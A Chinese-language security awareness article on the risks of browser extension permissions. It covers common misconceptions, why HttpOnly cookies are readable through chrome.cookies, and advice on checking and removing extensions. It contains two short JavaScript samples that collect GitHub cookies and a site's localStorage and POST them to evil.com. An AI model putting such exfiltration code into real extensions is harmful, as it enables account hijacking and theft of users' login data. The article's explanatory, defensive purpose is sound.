过去很长一段时间,我几乎什么浏览器插件都敢装:调试、翻译、抓包、下载、效率提升......直到我拆了一款热门"资源分享"类扩展的代码,才真正意识到:很多扩展拥有的权限,几乎等同于在你的浏览器里放了一个"贴身代理"。 很多人还停留在"插件 ≈ 一个小工具"层面,但从权限模型看,它们可以做到的远超你的想象。
目的:本文科普浏览器扩展权限风险、攻击面、审查方法与应急处置。所有示例仅用于安全意识教育,禁止用于任何非法用途。
触发案例
起因是我分析一款"资源整合分享"类插件,发现它在后台脚本里枚举指定站点所有 Cookie,再混淆打包上传。它用到的 API 全部是"合法"扩展接口;代码还做了层层混淆,普通用户根本不会注意。
这让我开始系统梳理:浏览器插件究竟能拿到多少"你以为安全"的东西?
常见误区
| 误区 | 真实情况 |
|---|---|
| 插件只在"我点它"时运行 | 有 background/service worker 事件驱动,能长期潜伏 |
| 页面 JS 读不到的(如 HttpOnly Cookie)插件也读不到 | 扩展是特权层,可用 chrome.cookies API |
| 没输账号密码就安全 | 登录态 / Token / LocalStorage / 页面变量都可能被取走 |
| 流行扩展一定可信 | 项目可转手,后期版本可"变质" |
| Manifest V3 已经杜绝恶意 | 只是收紧部分网络拦截,核心敏感面仍在 |
插件到底能干啥?
理论上可以:
-
读取你所有网页的内容
-
获取所有Cookie、localStorage,包括登录状态
-
监听你在网页上的操作(比如输入、点击)
-
注入自己的脚本,甚至"劫持"你的页面
-
远程把这些数据上传到第三方服务器
"HttpOnly Cookie 也能被浏览器插件读?"技术解释
页面脚本受 document.cookie 限制,而浏览器插件调用 chrome.cookies.getAll 走的是浏览器内部特权接口,不受 document.cookie 限制。
前提:
- manifest 声明 cookies 权限
- host_permissions 匹配域或 <all_urls>
- 没有被企业策略额外隔离
所以:HttpOnly 防的是 XSS 读取,不防"被你自己安装的特权扩展"。
真实案例:Cookie窃取
举个简单的例子,如果你登录了某个重要网站(比如GitHub、公司后台),插件是可以直接拿到你的登录Cookie的,然后在别的地方"复现"你的登录状态,直接控制你的账号!
恶意插件示例(最小代码示例,仅警示用途)
省略Manifest配置...
js
// background.js - 恶意插件示例(仅用于提醒目的)
chrome.cookies.getAll({ domain: "github.com" }, function(cookies) {
fetch("https://evil.com/api/upload", {
method: "POST",
body: JSON.stringify(cookies)
});
});这段代码的意思就是,把你在GitHub的所有Cookie都打包上传到远程恶意服务器上。只要你装了这个插件,哪怕你自己啥都没做,你的登录状态就已经被"偷家"了!
更可怕的:localStorage劫持
插件还可以注入脚本到你所在的网站,然后获取你的localstorage,上传到恶意服务器上
js
// 注入到目标网站的恶意脚本
chrome.scripting.executeScript({
target: {tabId: tabId},
func: () => {
const data = {};
// 获取localStorage
for (let i = 0; i < localStorage.length; i++) {
const key = localStorage.key(i);
if (key) {
data[key] = localStorage.getItem(key);
}
}
fetch('https://evil.com/upload', {
method: 'POST',
body: JSON.stringify(data)
});
}
});而且很多插件会用混淆、加密等方式隐藏自己的恶意行为,一般用户根本发现不了。
如何保护自己?
1. 谨慎安装插件
- 只从官方应用商店下载,不要去第三方网站下载插件
- 查看插件权限请求
- 阅读用户评价和评分
- 避免安装来源不明的插件
2. 检查插件权限
在Chrome中查看插件权限的步骤:
-
在地址栏输入: chrome://extensions/
-
找到对应插件
-
点击"详情"
-
查看"权限"部分
实际案例分析
以Adblock Plus为例,这是一个免费的广告拦截器:它的权限可以读取所有网站上的数据
继续点击网站设置可以看到其他的权限:
结论: 这个是全球用户量很大的开源插件,在Chrome商店也可以直接下载,但如果从事特殊工作的话还是不建议安装这类高权限插件。
3. 定期审查已安装插件
- 删除不再使用的插件
- 检查插件的更新记录
- 关注插件开发者的信誉
4. 使用浏览器安全功能
-
启用安全浏览模式
-
定期清理浏览器数据
-
使用无痕模式处理敏感操作
应急处理方案
如果发现恶意插件,立即执行以下步骤:
立即操作(5分钟内)
- 禁用可疑插件(先不要卸载,保留证据,后续通知团队安全负责人)
- 断网或切换设备
- 更改重要账号密码(银行、邮箱、社交媒体)
总结
Chrome插件安全是一个需要持续关注的话题。通过本指南,你应该能够:
- 识别:了解插件权限系统,识别潜在风险
- 防护:选择安全可靠的插件,避免恶意软件
- 检测:检查现有插件安全性
- 应对:发现问题时知道如何正确处理
最后提醒:重要操作时使用浏览器无痕模式